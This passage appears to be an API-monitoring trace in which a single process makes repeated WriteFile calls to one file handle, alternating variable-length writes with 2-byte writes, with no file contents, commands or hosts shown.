	[0102.393] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4c, lpOverlapped=0x0) returned 1
	[0102.393] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.393] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3a, lpOverlapped=0x0) returned 1
	[0102.393] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.394] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x53, lpOverlapped=0x0) returned 1
	[0102.394] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.394] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x29, lpOverlapped=0x0) returned 1
	[0102.394] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.394] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1d, lpOverlapped=0x0) returned 1
	[0102.394] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.395] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.395] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.395] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4e, lpOverlapped=0x0) returned 1
	[0102.395] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.395] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xf, lpOverlapped=0x0) returned 1
	[0102.395] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3d, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x13, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x53, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.396] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1a, lpOverlapped=0x0) returned 1
	[0102.397] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.397] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x51, lpOverlapped=0x0) returned 1
	[0102.397] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.397] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x41, lpOverlapped=0x0) returned 1
	[0102.397] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.398] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x16, lpOverlapped=0x0) returned 1
	[0102.398] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.398] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3f, lpOverlapped=0x0) returned 1
	[0102.398] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.398] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xd, lpOverlapped=0x0) returned 1
	[0102.398] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.399] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x47, lpOverlapped=0x0) returned 1
	[0102.399] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.399] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x17, lpOverlapped=0x0) returned 1
	[0102.399] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.399] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x46, lpOverlapped=0x0) returned 1
	[0102.399] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.400] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4d, lpOverlapped=0x0) returned 1
	[0102.400] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.400] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2f, lpOverlapped=0x0) returned 1
	[0102.400] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x40, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x16, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xf, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x26, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.401] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1b, lpOverlapped=0x0) returned 1
	[0102.402] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.402] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x25, lpOverlapped=0x0) returned 1
	[0102.402] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.402] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x57, lpOverlapped=0x0) returned 1
	[0102.402] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.402] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x15, lpOverlapped=0x0) returned 1
	[0102.403] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.403] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1a, lpOverlapped=0x0) returned 1
	[0102.403] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.403] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4b, lpOverlapped=0x0) returned 1
	[0102.403] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.404] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2f, lpOverlapped=0x0) returned 1
	[0102.404] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.404] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3a, lpOverlapped=0x0) returned 1
	[0102.404] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.404] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x26, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x13, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2b, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x15, lpOverlapped=0x0) returned 1
	[0102.405] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.406] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x12, lpOverlapped=0x0) returned 1
	[0102.406] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.406] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x18, lpOverlapped=0x0) returned 1
	[0102.406] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.406] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x11, lpOverlapped=0x0) returned 1
	[0102.406] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x30, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1d, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xe, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x34, lpOverlapped=0x0) returned 1
	[0102.407] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.408] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x12, lpOverlapped=0x0) returned 1
	[0102.408] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.408] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3f, lpOverlapped=0x0) returned 1
	[0102.408] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.408] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x18, lpOverlapped=0x0) returned 1
	[0102.408] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.409] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1d, lpOverlapped=0x0) returned 1
	[0102.409] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.409] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x27, lpOverlapped=0x0) returned 1
	[0102.409] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.409] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1a, lpOverlapped=0x0) returned 1
	[0102.409] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.410] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x5b, lpOverlapped=0x0) returned 1
	[0102.410] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.410] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x43, lpOverlapped=0x0) returned 1
